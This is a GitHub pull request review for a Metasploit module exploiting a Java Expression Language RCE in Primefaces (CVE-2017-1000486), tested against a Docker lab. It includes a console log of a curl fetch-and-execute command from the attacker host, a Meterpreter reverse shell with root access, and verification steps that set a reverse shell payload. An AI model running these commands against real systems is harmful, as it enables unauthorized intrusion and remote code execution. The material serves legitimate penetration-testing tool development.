Primefaces RCE (CVE-2017-1000486) #19649
documentation/modules/exploit/linux/http/primefaces_weak_encryption_rce.md
Thanks for the module @h00die. Two very minor suggestions. Testing was as expected:
msf6 exploit(multi/http/primefaces_weak_encryption_rce) > run
[*] Command to run on remote host: curl -so ./FQvScHoFLKS http://172.16.199.158:8080/nig1HLQ-oGgo_qtiZX9DSQ; chmod +x ./FQvScHoFLKS; ./FQvScHoFLKS &
[*] Fetch handler listening on 172.16.199.158:8080
[*] HTTP server started
[*] Adding resource /nig1HLQ-oGgo_qtiZX9DSQ
[*] Started reverse TCP handler on 172.16.199.158:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Victim evaluates java Expression Language expressions
[*] Attempting to execute: curl -so ./FQvScHoFLKS http://172.16.199.158:8080/nig1HLQ-oGgo_qtiZX9DSQ; chmod +x ./FQvScHoFLKS; ./FQvScHoFLKS &
[*] Client 172.17.0.2 requested /nig1HLQ-oGgo_qtiZX9DSQ
[*] Sending payload to 172.17.0.2 (curl/7.64.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 3 opened (172.16.199.158:4444 -> 172.17.0.2:37326) at 2024-12-05 09:48:36 -0900
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Debian 10.10 (Linux 5.15.0-125-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
I was getting an error when loading the module but realized it's not an issue and was due to this PR not having this fix in it: 6be0182#diff-3047a726f420e77dc5d2b2b2116a4e97a26cd5d1a0fbff495e0302e8bc2b3d80R909
yea, it's very annoying
all updated, I found a good URL for that link
Just standardizing the capitalization of "Java Expression Language". Looks great, landing now.
Release Notes
This adds a module which exploits a Java Expression Language RCE vulnerability in the Primefaces JSF framework. Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
fixes #18946
This one is super old, but it was in the Issues list as a half-constructed module (ChatGPT conversion?), so figured I'd get it up to standards.
Exploits an RCE in Primefaces. Docker image included, real easy to set up and exploit. Only certain payloads work on the docker image though, so check the docs.
Verification
use exploit/linux/http/primefaces_weak_encryption_rce
set rhosts <ip>
set verbose true
set payload payload/cmd/unix/reverse_jjs